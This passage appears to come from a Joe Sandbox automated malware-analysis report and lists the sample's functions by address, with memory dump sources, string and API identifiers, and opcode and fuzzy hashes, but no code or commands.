                                                                                                                                                                                                                                                                    • API String ID: 0-261129489
                                                                                                                                                                                                                                                                    • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                    • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                                                    Function 024BB763 Relevance: 5.5, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                    • API String ID: 0-261129489
                                                                                                                                                                                                                                                                    • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                    • Instruction ID: d8023877f1d4f0a9fd76882124d92d38ceb2f3f40d54c865e1d6b88deb20c264
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0E1B67151C3C18AE775CF2584507FBBBD6EFD6208F1888AEC5D987292DB39410ACB26
                                                                                                                                                                                                                                                                    Function 0042B4FC Relevance: 5.5, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                    • API String ID: 0-261129489
                                                                                                                                                                                                                                                                    • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                    • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                                                    Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                                    • API String ID: 0-2418547040
                                                                                                                                                                                                                                                                    • Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                    • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                                    Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                    • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                    • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                                                    Function 0249D25A Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                                    • API String ID: 0-483502859
                                                                                                                                                                                                                                                                    • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                    • Instruction ID: d40615f4737d9136a2fb5e2ea9650c8d22d56d4359be3b3524cf045ddf46b0bc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09A1A1B56017818FD728CF29C590A62BFF2EF96314B1995AEC4D68F766D734E802CB10
                                                                                                                                                                                                                                                                    Function 0040CFF3 Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                                    • API String ID: 0-483502859
                                                                                                                                                                                                                                                                    • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                    • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                                                    Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                                                    • API String ID: 0-2543814982
                                                                                                                                                                                                                                                                    • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                    • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                                                    Function 024A87DF Relevance: 4.0, Strings: 3, Instructions: 234COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                                    • API String ID: 0-3307990326
                                                                                                                                                                                                                                                                    • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                    • Instruction ID: 42d08a021de3f72c2cb7fa87eb591ac07f85e20f86aec561d7416a97d7d4ee9e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A081CE756007128FC728CF29C8A0A67B7F2FFA9710B19859DD8824FB65EB34E841CB55
                                                                                                                                                                                                                                                                    Function 024A99D7 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                    • API String ID: 0-936430989
                                                                                                                                                                                                                                                                    • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                    • Instruction ID: c0b8439f0c26c5a6023c669713cfb19d18569ccc3e59d052a4a45f8e55fa5d3e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4482F6746083509FD764CF24D8A0B2FBBE2EBE6714F28892EE58547391D771D842CB46
                                                                                                                                                                                                                                                                    Function 00419770 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                                    • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                    • API String ID: 2994545307-936430989
                                                                                                                                                                                                                                                                    • Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                                    • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                                    Function 0249DF8C Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Uninitialize
                                                                                                                                                                                                                                                                    • String ID: PT
                                                                                                                                                                                                                                                                    • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                                    • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                    • Instruction ID: eff78ee87d626d3a0da557417c581b5285bdc2136f2726833c12f01c07caa04a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0A1DFB46087918FD726CF39C4A0A62BFE1EF57204B18869EC4D24FB66D339E406CB15
                                                                                                                                                                                                                                                                    Function 0040DD25 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Uninitialize
                                                                                                                                                                                                                                                                    • String ID: PT
                                                                                                                                                                                                                                                                    • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                                    • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                    • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                                                    Function 0249ABA7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: BE$de
                                                                                                                                                                                                                                                                    • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                    • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                    • Instruction ID: 0e8e7438c804aa875dc6167410859db01fb727295b33fbb0f872cd46ad9a3b9a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61D1097265C3648BDB24DF2888516AFFFE2EFC1208F18492DE8D59B391D675C506CB82
                                                                                                                                                                                                                                                                    Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: BE$de
                                                                                                                                                                                                                                                                    • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                    • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                    • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                                    Function 024CCD87 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: @$ihgf
                                                                                                                                                                                                                                                                    • API String ID: 0-73152791
                                                                                                                                                                                                                                                                    • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                    • Instruction ID: 3b0646e180deb50f7a5a6296c2ddec3a8370d05c4e091f09dadf3508a8fc815a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 814127B56043018BD754CF28C88177BBBA2FFC2318F24862EE4499B390E735D805CB82
                                                                                                                                                                                                                                                                    Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                                    • String ID: @$ihgf
                                                                                                                                                                                                                                                                    • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                                                    • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                    • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                                                    Function 024A554C Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: Z\$^P
                                                                                                                                                                                                                                                                    • API String ID: 0-3724859648
                                                                                                                                                                                                                                                                    • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                    • Instruction ID: 6ef4766a72a4222674f0c3935a1b9cb7306982faf8762867b4605a3192e60b05
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E941C0B2911600CFC718CF28C9A2A62B7B2FF59314B1A859DD49B8F7A4E738E441CF55
                                                                                                                                                                                                                                                                    Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: AzB$`rB
                                                                                                                                                                                                                                                                    • API String ID: 0-365317308
                                                                                                                                                                                                                                                                    • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                    • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                                    Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: AzB$`rB
                                                                                                                                                                                                                                                                    • API String ID: 0-365317308
                                                                                                                                                                                                                                                                    • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                    • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                                    Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
